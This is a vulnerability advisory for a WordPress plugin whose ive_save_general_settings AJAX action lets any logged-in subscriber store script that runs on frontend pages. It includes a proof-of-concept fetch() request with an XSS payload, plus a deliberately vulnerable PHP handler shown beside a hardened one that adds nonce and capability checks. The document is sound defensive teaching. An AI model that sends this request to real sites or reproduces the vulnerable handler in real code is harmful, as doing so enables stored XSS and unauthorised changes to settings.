The plugin does not perform authorisation or CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated user, such as a subscriber, to call it and change the plugin's settings, which could lead to a Stored Cross-Site Scripting issue. Note: v1.1.4.7 added the CSRF check; the authorisation check was added in 1.1.4.9.
```javascript
// Proof of concept from the advisory: a POST to admin-ajax.php with the
// cookies of any logged-in user (e.g. a subscriber) reaches the action and
// stores the ive_custom_js value without a nonce or capability check.
fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=ive_save_general_settings&ive_custom_js=alert(/XSS/)",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```
The stored script is then output on every frontend page, so the XSS triggers on all frontend pages in the Pro version.
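To show what the two missing checks look like in a WordPress AJAX handler, here is an added example (not the plugin's own code, and not taken from its 1.1.4.7 or 1.1.4.9 fixes). The action name ive_save_general_settings and the ive_custom_js field come from the advisory; the function names, option name, nonce name, script handle and settings-page hook are hypothetical. The vulnerable handler is kept beside the hardened one so the difference is visible.

```php
<?php
/**
 * Added example, not the plugin's own code. A wp_ajax_* settings handler in
 * its vulnerable form and in a hardened form that adds the two checks the
 * advisory says were missing: CSRF (nonce) and authorisation (capability).
 * Action name and ive_custom_js field are from the advisory; everything else
 * (function, option, nonce and handle names) is hypothetical.
 */

// --- Vulnerable pattern (what the advisory describes) --------------------
// wp_ajax_* handlers run for ANY logged-in user, subscribers included.
// Nothing verifies who is calling or whether the request was intended, so a
// subscriber, or a CSRF page visited by any logged-in user, can store script
// that the plugin later prints on the frontend.
function ive_save_general_settings_vulnerable() {
    $settings              = get_option( 'ive_general_settings', array() );
    $settings['custom_js'] = isset( $_POST['ive_custom_js'] ) ? wp_unslash( $_POST['ive_custom_js'] ) : '';
    update_option( 'ive_general_settings', $settings );
    wp_send_json_success();
}
// add_action( 'wp_ajax_ive_save_general_settings', 'ive_save_general_settings_vulnerable' );

// --- Hardened pattern -----------------------------------------------------
function ive_save_general_settings_hardened() {
    // 1. CSRF: require a nonce bound to this action and to the calling user.
    //    On failure check_ajax_referer() terminates the request (HTTP 403)
    //    before any state changes.
    check_ajax_referer( 'ive_save_general_settings', 'nonce' );

    // 2. Authorisation: a valid nonce only proves the request came from this
    //    user's own session, not that the user may change settings. The value
    //    is executed as script on every frontend page, so gate it on the
    //    capability WordPress itself uses for raw script/HTML.
    if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'unfiltered_html' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input: unslash only. The field is script by design, so for the
    //    privileged caller it is stored as-is rather than run through an
    //    HTML sanitiser that would strip it.
    $custom_js = isset( $_POST['ive_custom_js'] ) ? wp_unslash( $_POST['ive_custom_js'] ) : '';

    $settings              = get_option( 'ive_general_settings', array() );
    $settings['custom_js'] = $custom_js;
    update_option( 'ive_general_settings', $settings );
    wp_send_json_success();
}
add_action( 'wp_ajax_ive_save_general_settings', 'ive_save_general_settings_hardened' );

// --- Issuing the nonce to the legitimate settings page --------------------
// The settings form must send the nonce the handler checks. The nonce action
// string must match the one passed to check_ajax_referer() above. The page
// hook suffix and script handle are hypothetical.
function ive_settings_page_scripts( $hook_suffix ) {
    if ( 'settings_page_ive-general' !== $hook_suffix ) {
        return;
    }
    wp_enqueue_script( 'ive-settings', plugins_url( 'settings.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'ive-settings', 'iveSettings', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'ive_save_general_settings' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'ive_settings_page_scripts' );
```

Against the hardened handler, the request shown above fails at the nonce check because it carries no nonce parameter. The capability check is still needed on top of it: a nonce is issued to whichever logged-in user can load the page that generates it and only ties the request to that user's session, so a CSRF check alone does not stop a low-privilege user from changing settings. That is why both checks matter, which matches the advisory's note that the CSRF check and the authorisation check were added in separate releases.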